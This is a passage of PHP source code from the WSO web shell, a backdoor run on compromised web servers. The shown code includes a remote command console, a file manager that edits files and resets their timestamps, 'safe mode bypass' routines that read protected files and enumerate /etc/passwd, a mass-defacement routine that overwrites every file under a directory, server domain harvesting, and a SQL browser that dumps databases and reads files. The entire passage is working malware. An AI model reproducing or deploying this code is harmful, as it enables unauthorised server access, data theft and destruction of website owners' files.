return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);
}
usort($files, "wsoCmp");
usort($dirs, "wsoCmp");
$files = array_merge($dirs, $files);
$l = 0;
foreach($files as $f) {
echo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\'FilesTools\',null,\'\'.urlencode($f[\'name\']).\'\', \'view\')">\'.htmlspecialchars($f[\'name\']):\'g(\'FilesMan\',\'\'.$f[\'path\'].\'\');"><b>[ \'.htmlspecialchars($f[\'name\']).\' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?wsoViewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\'FilesTools\',null,\'\'.urlencode($f[\'name\']).\'\',\'chmod\')">\'.$f[\'perms\']
.\'</td><td><a href="#" onclick="g(\'FilesTools\',null,\'\'.urlencode($f[\'name\']).\'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\'\'.urlencode($f[\'name\']).\'\', \'touch\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a href="#" onclick="g(\'FilesTools\',null,\'\'.urlencode($f[\'name\']).\'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\'\'.urlencode($f[\'name\']).\'\', \'download\')">D</a>\':\'\').\'</td></tr>\';
$l = $l?0:1;
}
echo "<tr><td colspan=7>
<input type=hidden name=a value=\'FilesMan\'>
<input type=hidden name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'>
<input type=hidden name=charset value=\'". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\')."\'>
<select name=\'p1\'><option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\'>Delete</option>";
if(class_exists(\'ZipArchive\'))
echo "<option value=\'zip\'>Compress (zip)</option><option value=\'unzip\'>Uncompress (zip)</option>";
if(!empty($_SESSION[\'act\'])&&@count($_SESSION[\'f\']))
echo "<option value=\'paste\'>Paste / zip</option>";
echo "</select> <input type=\'submit\' value=\'>>\'></td></tr></form></table></div>";
wsoFooter();
}
function actionStringTools() {
if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));}}
if(!function_exists(\'binhex\')) {function binhex($p) {return dechex(bindec($p));}}
if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
if(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';for($i=0;$i<strlen($p);++$i)$r.= sprintf(\'%02X\',ord($p[$i]));return strtoupper($r);}}
if(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';for($i=0;$i<strlen($p);++$i)$r.= \'%\'.dechex(ord($p[$i]));return strtoupper($r);}}
$stringTools = array(
\'Base64 encode\' => \'base64_encode\',
\'Base64 decode\' => \'base64_decode\',
\'Url encode\' => \'urlencode\',
\'Url decode\' => \'urldecode\',
\'Full urlencode\' => \'full_urlencode\',
\'md5 hash\' => \'md5\',
\'sha1 hash\' => \'sha1\',
\'crypt\' => \'crypt\',
\'CRC32\' => \'crc32\',
\'ASCII to HEX\' => \'ascii2hex\',
\'HEX to ASCII\' => \'hex2ascii\',
\'HEX to DEC\' => \'hexdec\',
\'HEX to BIN\' => \'hex2bin\',
\'DEC to HEX\' => \'dechex\',
\'DEC to BIN\' => \'decbin\',
\'BIN to HEX\' => \'binhex\',
\'BIN to DEC\' => \'bindec\',
\'String to lower case\' => \'strtolower\',
\'String to upper case\' => \'strtoupper\',
\'Htmlspecialchars\' => \'htmlspecialchars\',
\'String length\' => \'strlen\',
);
if(isset($_POST[\'ajax\'])) {
$_SESSION[$_SERVER[\'HTTP_HOST\'].\'ajax\'] = true;
ob_start();
if(in_array($_POST[\'p1\'], $stringTools))
echo $_POST[\'p1\']($_POST[\'p2\']);
$temp = "document.getElementById(\'strOutput\').style.display=\'\';document.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"
\\'")."\';
";
echo strlen($temp), "
", $temp;
exit;
}
wsoHeader();
echo \'<h1>String conversions</h1><div class=content>\';
if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))
$_SESSION[$_SERVER[\'HTTP_HOST\'].\'ajax\'] = false;
echo "<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;\'><select name=\'selectTool\'>";
foreach($stringTools as $k => $v)
echo "<option value=\'".htmlspecialchars($v)."\'>".$k."</option>";
echo "</select><input type=\'submit\' value=\'>>\'/> <input type=checkbox name=ajax value=1 ".(@$_SESSION[$_SERVER[\'HTTP_HOST\'].\'ajax\']?\'checked\':\'\')."> send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=bigarea>".(empty($_POST[\'p1\'])?\'\':htmlspecialchars(@$_POST[\'p2\']))."</textarea></form><pre class=\'ml1\' style=\'".(empty($_POST[\'p1\'])?\'display:none;\':\'\')."margin-top:5px\' id=\'strOutput\'>";
if(!empty($_POST[\'p1\'])) {
if(in_array($_POST[\'p1\'], $stringTools))echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));
}
echo"</pre></div><br><h1>Search text in files:</h1><div class=content>
<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding=\'1\' cellspacing=\'0\' width=\'50%\'>
<tr><td width=\'1%\'>Text:</td><td><input type=\'text\' name=\'text\' style=\'width:100%\'></td></tr>
<tr><td>Path:</td><td><input type=\'text\' name=\'cwd\' value=\'". htmlspecialchars($GLOBALS[\'cwd\']) ."\' style=\'width:100%\'></td></tr>
<tr><td>Name:</td><td><input type=\'text\' name=\'filename\' value=\'*\' style=\'width:100%\'></td></tr>
<tr><td></td><td><input type=\'submit\' value=\'>>\'></td></tr>
</table></form>";
function wsoRecursiveGlob($path) {
if(substr($path, -1) != \'/\')
$path.=\'/\';
$paths = @array_unique(@array_merge(@glob($path.$_POST[\'p3\']), @glob($path.\'*\', GLOB_ONLYDIR)));
if(is_array($paths)&&@count($paths)) {
foreach($paths as $item) {
if(@is_dir($item)){
if($path!=$item)
wsoRecursiveGlob($item);
} else {
if(@strpos(@file_get_contents($item), @$_POST[\'p2\'])!==false)
echo "<a href=\'#\' onclick=\'g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\")\'>".htmlspecialchars($item)."</a><br>";
}
}
}
}
if(@$_POST[\'p3\'])
wsoRecursiveGlob($_POST[\'c\']);
echo "</div><br><h1>Search for hash:</h1><div class=content>
<form method=\'post\' target=\'_blank\' name=\'hf\'>
<input type=\'text\' name=\'hash\' style=\'width:200px;\'><br>
<input type=\'button\' value=\'hashcrack.com\' onclick=\"document.hf.action=\'http://www.hashcrack.com/index.php\';document.hf.submit()\"><br>
<input type=\'button\' value=\'milw0rm.com\' onclick=\"document.hf.action=\'http://www.milw0rm.com/cracker/search.php\';document.hf.submit()\"><br>
<input type=\'button\' value=\'hashcracking.info\' onclick=\"document.hf.action=\'https://hashcracking.info/index.php\';document.hf.submit()\"><br>
<input type=\'button\' value=\'md5.rednoize.com\' onclick=\"document.hf.action=\'http://md5.rednoize.com/?q=\'+document.hf.hash.value+\'&s=md5\';document.hf.submit()\"><br>
<input type=\'button\' value=\'md5decrypter.com\' onclick=\"document.hf.action=\'http://www.md5decrypter.com/\';document.hf.submit()\"><br>
</form></div>";
wsoFooter();
}
function actionFilesTools() {
if( isset($_POST[\'p1\']) )
$_POST[\'p1\'] = urldecode($_POST[\'p1\']);
if(@$_POST[\'p2\']==\'download\') {
if(@is_file($_POST[\'p1\']) && @is_readable($_POST[\'p1\'])) {
ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment; filename=".basename($_POST[\'p1\']));
if (function_exists("mime_content_type")) {
$type = @mime_content_type($_POST[\'p1\']);
header("Content-Type: ".$type);
}
$fp = @fopen($_POST[\'p1\'], "r");
if($fp) {
while(!@feof($fp))
echo @fread($fp, 1024);
fclose($fp);
}
}exit;
}
if( @$_POST[\'p2\'] == \'mkfile\' ) {
if(!file_exists($_POST[\'p1\'])) {
$fp = @fopen($_POST[\'p1\'], \'w\');
if($fp) {
$_POST[\'p2\'] = "edit";
fclose($fp);
}
}
}
wsoHeader();
echo \'<h1>File tools</h1><div class=content>\';
if( !file_exists(@$_POST[\'p1\']) ) {
echo \'File not exists\';
wsoFooter();
return;
}
$uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));
if(!$uid) {
$uid[\'name\'] = @fileowner($_POST[\'p1\']);
$gid[\'name\'] = @filegroup($_POST[\'p1\']);
} else $gid = @posix_getgrgid(@filegroup($_POST[\'p1\']));
echo \'<span>Name:</span> \'.htmlspecialchars(@basename($_POST[\'p1\'])).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?wsoViewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.wsoPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';
echo \'<span>Create time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';
if( empty($_POST[\'p2\']) )
$_POST[\'p2\'] = \'view\';
if( is_file($_POST[\'p1\']) )
$m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');
else
$m = array(\'Chmod\', \'Rename\', \'Touch\');
foreach($m as $v)
echo \'<a href=# onclick="g(null,null,null,\'\'.strtolower($v).\'\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';
echo \'<br><br>\';
switch($_POST[\'p2\']) {
case \'view\':
echo \'<pre class=ml1>\';
$fp = @fopen($_POST[\'p1\'], \'r\');
if($fp) {
while( !@feof($fp) )
echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo \'</pre>\';
break;
case \'highlight\':
if( @is_readable($_POST[\'p1\']) ) {
echo \'<div class=ml1 style="background-color: #e1e1e1;color:black;">\';
$code = @highlight_file($_POST[\'p1\'],true);
echo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div>\';
}
break;
case \'chmod\':
if( !empty($_POST[\'p3\']) ) {
$perms = 0;
for($i=strlen($_POST[\'p3\'])-1;$i>=0;--$i)
$perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));
if(!@chmod($_POST[\'p1\'], $perms))
echo \'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>\';
}
clearstatcache();
echo \'<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value=">>"></form>\';
break;
case \'edit\':
if( !is_writable($_POST[\'p1\'])) {
echo \'File isn\'t writeable\';
break;
}
if( !empty($_POST[\'p3\']) ) {
$time = @filemtime($_POST[\'p1\']);
$_POST[\'p3\'] = substr($_POST[\'p3\'],1);
$fp = @fopen($_POST[\'p1\'],"w");
if($fp) {
@fwrite($fp,$_POST[\'p3\']);
@fclose($fp);
echo \'Saved!<br><script>p3_="";</script>\';
@touch($_POST[\'p1\'],$time,$time);
}
}
echo \'<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>\';
$fp = @fopen($_POST[\'p1\'], \'r\');
if($fp) {
while( !@feof($fp) )
echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo \'</textarea><input type=submit value=">>"></form>\';
break;
case \'hexdump\':
$c = @file_get_contents($_POST[\'p1\']);
$n = 0;
$h = array(\'00000000<br>\',\'\',\'\');
$len = strlen($c);
for ($i=0; $i<$len; ++$i) {
$h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';
switch ( ord($c[$i]) ) {
case 0: $h[2] .= \' \'; break;
case 9: $h[2] .= \' \'; break;
case 10: $h[2] .= \' \'; break;
case 13: $h[2] .= \' \'; break;
default: $h[2] .= $c[$i]; break;
}
$n++;
if ($n == 32) {
$n = 0;
if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';}
$h[1] .= \'<br>\';
$h[2] .= "
";
}
}
echo \'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';
break;
case \'rename\':
if( !empty($_POST[\'p3\']) ) {
if(!@rename($_POST[\'p1\'], $_POST[\'p3\']))
echo \'Can\'t rename!<br>\';
else
die(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');
}
echo \'<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value=">>"></form>\';
break;
case \'touch\':
if( !empty($_POST[\'p3\']) ) {
$time = strtotime($_POST[\'p3\']);
if($time) {
if(!touch($_POST[\'p1\'],$time,$time))
echo \'Fail!\';
else
echo \'Touched!\';
} else echo \'Bad time format!\';
}
clearstatcache();
echo \'<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value=">>"></form>\';
break;
}
echo \'</div>\';
wsoFooter();
}
function actionSafeMode() {
$temp=\'\';
ob_start();
switch($_POST[\'p1\']) {
case 1:
$temp=@tempnam($test, \'cx\');
if(@copy("compress.zlib://".$_POST[\'p2\'], $temp)){
echo @file_get_contents($temp);
unlink($temp);
} else
echo \'Sorry... Can\'t open file\';
break;
case 2:
$files = glob($_POST[\'p2\'].\'*\');
if( is_array($files) )
foreach ($files as $filename)
echo $filename."
";
break;
case 3:
$ch = curl_init("file://".$_POST[\'p2\']."".preg_replace(\'!\(\d+\)\s.*!\', \'\', __FILE__));
curl_exec($ch);
break;
case 4:
ini_restore("safe_mode");
ini_restore("open_basedir");
include($_POST[\'p2\']);
break;
case 5:
for(;$_POST[\'p2\'] <= $_POST[\'p3\'];$_POST[\'p2\']++) {
$uid = @posix_getpwuid($_POST[\'p2\']);
if ($uid)
echo join(\':\',$uid)."
";
}
break;
}
$temp = ob_get_clean();
wsoHeader();
echo \'<h1>Safe mode bypass</h1><div class=content>\';
echo \'<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>\';
if($temp)
echo \'<pre class="ml1" style="margin-top:5px" id="Output">\'.htmlspecialchars($temp).\'</pre>\';
echo \'</div>\';
wsoFooter();
}
function actionConsole() {
if(isset($_POST[\'ajax\'])) {
$_SESSION[$_SERVER[\'HTTP_HOST\'].\'ajax\'] = true;
ob_start();
echo "document.cf.cmd.value=\'\';
";
$temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("
$ ".$_POST[\'p1\']."
".wsoEx($_POST[\'p1\']),"
\\'"));
if(preg_match("!.*cd\s+([^;]+)$!",$_POST[\'p1\'],$match)) {
if(@chdir($match[1])) {
$GLOBALS[\'cwd\'] = @getcwd();
echo "document.mf.c.value=\'".$GLOBALS[\'cwd\']."\';";
}
}
echo "document.cf.output.value+=\'".$temp."\';";
echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
$temp = ob_get_clean();
echo strlen($temp), "
", $temp;
exit;
}
wsoHeader();
echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array(\'\');
var cur = 0;
function kp(e) {
var n = (window.Event) ? e.which : e.keyCode;
if(n == 38) {
cur--;
if(cur>=0)
document.cf.cmd.value = cmds[cur];
else
cur++;
} else if(n == 40) {
cur++;
if(cur < cmds.length)
document.cf.cmd.value = cmds[cur];
else
cur--;
}
}
function add(cmd) {
cmds.pop();
cmds.push(cmd);
cmds.push(\'\');
cur = cmds.length-1;
}
</script>";
echo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>\';
foreach($GLOBALS[\'aliases\'] as $n => $v) {
if($v == \'\') {
echo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\';
continue;
}
echo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\';
}
if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))
$_SESSION[$_SERVER[\'HTTP_HOST\'].\'ajax\'] = false;
echo \'</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 \'.(@$_SESSION[$_SERVER[\'HTTP_HOST\'].\'ajax\']?\'checked\':\'\').\'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>\';
if(!empty($_POST[\'p1\'])) {
echo htmlspecialchars("$ ".$_POST[\'p1\']."
".wsoEx($_POST[\'p1\']));
}
echo \'</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">\';
echo \'</form></div><script>document.cf.cmd.focus();</script>\';
wsoFooter();
}
function actionSelfRemove() {
if($_POST[\'p1\'] == \'yes\')
if(@unlink(preg_replace(\'!\(\d+\)\s.*!\', \'\', __FILE__)))
die(\'Shell has been removed\');
else
echo \'unlink error!\';
if($_POST[\'p1\'] != \'yes\')
wsoHeader();
echo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>\';
wsoFooter();
}
//** updates
function clear_fill($filo,$index){
if(file_exists($filo)){
$handle = fopen($filo,\'w\');
fwrite($handle,\'\');
fwrite($handle,$index);
fclose($handle); } }
/////////
function do_it(){
global $dir , $index ;
chdir($dir);
$me = str_replace(dirname(__FILE__).\'/\',\'\',__FILE__);
$filos = scandir($dir) ;
$notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
sort($filos);
$n = 0 ;
echo "<center><textarea style=\'width: 950px; height: 300px;\'>";
foreach ($filos as $filo){
if ( $filo != $me && is_dir($filo) != 1 && !in_array($filo, $notallow) ) {
echo "$dir/$filo ====> ";
edit_file($filo,$index);
flush();
$n = $n +1 ;
} }
echo "</textarea>";
echo "<br>";
echo "<br><h3>$n File Detected</h3></center><br>";
}
//////////////////////////////
function ListFiles($dirall) {
if($dh = opendir($dirall)) {
$filos = Array();
$inner_files = Array();
$me = str_replace(dirname(__FILE__).\'/\',\'\',__FILE__);
$notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
while($filo = readdir($dh)) {
if($filo != "." && $filo != ".." && $filo[0] != \'.\' && !in_array($filo, $notallow) ) {
if(is_dir($dirall . "/" . $filo)) {
$inner_files = ListFiles($dirall . "/" . $filo);
if(is_array($inner_files)) $filos = array_merge($filos, $inner_files);
} else {
array_push($filos, $dirall . "/" . $filo);
}
}
}
closedir($dh);
return $filos;
}
}
//////////////////////////////////////////
function do_it_all(){
global $index ;
$dirall=$_POST[\'dir\'];
echo "<center><textarea style=\'width: 950px; height: 300px;\'>";
echo "Blowing All Files In Main Dir
Task Started ;D
";
foreach (ListFiles($dirall) as $key=>$filo){
$filo = str_replace(\'//\',"/",$filo);
echo "$filo ===>";
edit_file($filo,$index);
flush();
}
echo "</textarea>";
$key = $key+1;
echo "<br><h3>$key File Detected</h3></center><br>"; }
////////
function actionMass() {
wsoHeader();
echo "<h1>Mass Defeace All Files</h1><div class=content>
<form name=\'mass\' onSubmit=\"g(null,null,\'bpp\',this.option.value);return false;\"><br>
<strong>Index Code Here :</strong><br>
<textarea placeholder=\'Please Put Your Index Or Domains here !!\' name=\'index\' class=bigarea></textarea><br><br>
<strong>Main Dir : </strong>
<input name=\'dir\' style=\'width: 550px\' type=\'text\' value=".getcwd()."/> | <strong>Options : </strong>
<select name=\'option\' style=\'width: 200px\'>
<option> </option>
<option>Only for Selected Folder</option>
<option>For all Sub Folders</option>
</select>
<input name=\'indexit\' type=\'submit\' value=\'Brute It\' style=\'width: 81px\'><br></form>";
if(isset($_POST[\'p1\'])) {
if ($_POST[\'indexit\'])
{
if ($_POST[\'option\']=="Only for Selected Folder"){ do_it() ;}
elseif ($_POST[\'option\']=="For all Sub Folders"){ do_it_all(); }
else {echo "Please select one option to work on it !!"; }
} }
wsoFooter();
}
function actionDomain() {
wsoHeader();
echo "<h1>Get All Server Domains</h1><div class=content>";
$d0mains = @file("/etc/named.conf");
if(!$d0mains){ echo "<br> Can\'t ReaD -> [/etc/named.conf]";}
else {
echo "<table align=center border=1>
<tr><td><b><span style=\'color:red\'>Domain</span></b></td><td><b><span style=\'color:red\'>User</span></b></td></tr>";
foreach($d0mains as $d0main){
if(eregi("zone",$d0main)){
preg_match_all(\'#zone "(.*)"#\', $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
echo "<tr><td><a target=\'_blank\' href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user[\'name\']."</td></tr>"; flush();
}}}
echo "</table>
<p align=\'center\'>";
}
wsoFooter();
}
function actionSql() {
class DbClass {
var $type;
var $link;
var $res;
function DbClass($type) {
$this->type = $type;
}
function connect($host, $user, $pass, $dbname){
switch($this->type) {
case \'mysql\':
if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
break;
case \'pgsql\':
$host = explode(\':\', $host);
if(!$host[1]) $host[1]=5432;
if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
break;
}
return false;
}
function selectdb($db) {
switch($this->type) {
case \'mysql\':
if (@mysql_select_db($db))return true;
break;
}
return false;
}
function query($str) {
switch($this->type) {
case \'mysql\':
return $this->res = @mysql_query($str);
break;
case \'pgsql\':
return $this->res = @pg_query($this->link,$str);
break;
}
return false;
}
function fetch() {
$res = func_num_args()?func_get_arg(0):$this->res;
switch($this->type) {
case \'mysql\':
return @mysql_fetch_assoc($res);
break;
case \'pgsql\':
return @pg_fetch_assoc($res);
break;
}
return false;
}
function listDbs() {
switch($this->type) {
case \'mysql\':
return $this->res = @mysql_list_dbs($this->link);
break;
case \'pgsql\':
return $this->res = $this->query("SELECT datname FROM pg_database");
break;
}
return false;
}
function listTables() {
switch($this->type) {
case \'mysql\':
return $this->res = $this->query(\'SHOW TABLES\');
break;
case \'pgsql\':
return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != \'information_schema\' AND table_schema != \'pg_catalog\') or table_name = \'pg_shadow\'");
break;
}
return false;
}
function error() {
switch($this->type) {
case \'mysql\':
return @mysql_error($this->link);
break;
case \'pgsql\':
return @pg_last_error($this->link);
break;
}
return false;
}
function setCharset($str) {
switch($this->type) {
case \'mysql\':
if(function_exists(\'mysql_set_charset\'))
return @mysql_set_charset($str, $this->link);
else
$this->query(\'SET CHARSET \'.$str);
break;
case \'pgsql\':
return @pg_set_client_encoding($this->link, $str);
break;
}
return false;
}
function loadFile($str) {
switch($this->type) {
case \'mysql\':
return $this->fetch($this->query("SELECT LOAD_FILE(\'".addslashes($str)."\') as file"));
break;
case \'pgsql\':
$this->query("CREATE TABLE wso2(file text);COPY wso2 FROM \'".addslashes($str)."\';select file from wso2;");
$r=array();
while($i=$this->fetch())
$r[] = $i[\'file\'];
$this->query(\'drop table wso2\');
return array(\'file\'=>implode("
",$r));
break;
}
return false;
}
function dump($table) {
switch($this->type) {
case \'mysql\':
$res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');
$create = mysql_fetch_array($res);
echo $create[1].";
";
$this->query(\'SELECT * FROM `\'.$table.\'`\');
while($item = $this->fetch()) {
$columns = array();
foreach($item as $k=>$v) {
$item[$k] = "\'".@mysql_real_escape_string($v)."\'";
$columns[] = "`".$k."`";
}
echo \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\'."
";
}
break;
case \'pgsql\':
$this->query(\'SELECT * FROM \'.$table);
while($item = $this->fetch()) {
$columns = array();
foreach($item as $k=>$v) {
$item[$k] = "\'".addslashes($v)."\'";
$columns[] = $k;
}
echo \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\'."
";
}
break;
}
return false;
}
};
$db = new DbClass($_POST[\'type\']);
if(@$_POST[\'p2\']==\'download\') {
ob_start("ob_gzhandler", 4096);
$db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);
$db->selectdb($_POST[\'sql_base\']);
header("Content-Disposition: attachment; filename=dump.sql");
header("Content-Type: text/plain");
foreach($_POST[\'tbl\'] as $v)
$db->dump($v);
exit;
}
wsoHeader();
echo "
<h1>Sql browser</h1><div class=content>
<form name=\'sf\' method=\'post\'><table cellpadding=\'2\' cellspacing=\'0\'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=a value=Sql><input type=hidden name=p1 value=\'query\'><input type=hidden name=p2><input type=hidden name=c value=\'". htmlspecialchars($GLOBALS[\'cwd\']) ."\'><input type=hidden name=charset value=\'". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') ."\'>
<td><select name=\'type\'><option value=\'mysql\' ";
if(@$_POST[\'type\']==\'mysql\')echo \'selected\';
echo ">MySql</option><option value=\'pgsql\' ";
if(@$_POST[\'type\']==\'pgsql\')echo \'selected\';
echo ">PostgreSql</option></select></td>
<td><input type=text name=sql_host value=\'". (empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])) ."\'></td>
<td><input type=text name=sql_login value=\'". (empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])) ."\'></td>
<td><input type=text name=sql_pass value=\'". (empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])) ."\'></td><td>";
$tmp = "<input type=text name=sql_base value=\'\'>";
if(isset($_POST[\'sql_host\'])){
if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) {
switch($_POST[\'charset\']) {
case "Windows-1251": $db->setCharset(\'cp1251\'); break;
case "UTF-8": $db->setCharset(\'utf8\'); break;
case "KOI8-R": $db->setCharset(\'koi8r\'); break;
case "KOI8-U": $db->setCharset(\'koi8u\'); break;
case "cp866": $db->setCharset(\'cp866\'); break;
}
$db->listDbs();
echo "<select name=sql_base><option value=\'\'></option>";
while($item = $db->fetch()) {
list($key, $value) = each($item);
echo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';
}
echo \'</select>\';
}
else echo $tmp;
}else
echo $tmp;
echo "</td>
<td><input type=submit value=\'>>\'></td>
</tr>
</table>
<script>
function st(t,l) {
document.sf.p1.value = \'select\';
document.sf.p2.value = t;
if(l!=null)document.sf.p3.value = l;
document.sf.submit();
}
function is() {
for(i=0;i<document.sf.elements[\'tbl[]\'].length;++i)
document.sf.elements[\'tbl[]\'][i].checked = !document.sf.elements[\'tbl[]\'][i].checked;
}
</script>";
if(isset($db) && $db->link){
echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
if(!empty($_POST[\'sql_base\'])){
$db->selectdb($_POST[\'sql_base\']);
echo "<tr><td width=1 style=\'border-top:2px solid #666;border-right:2px solid #666;\'><span>Tables:</span><br><br>";
$tbls_res = $db->listTables();
while($item = $db->fetch($tbls_res)) {
list($key, $value) = each($item);
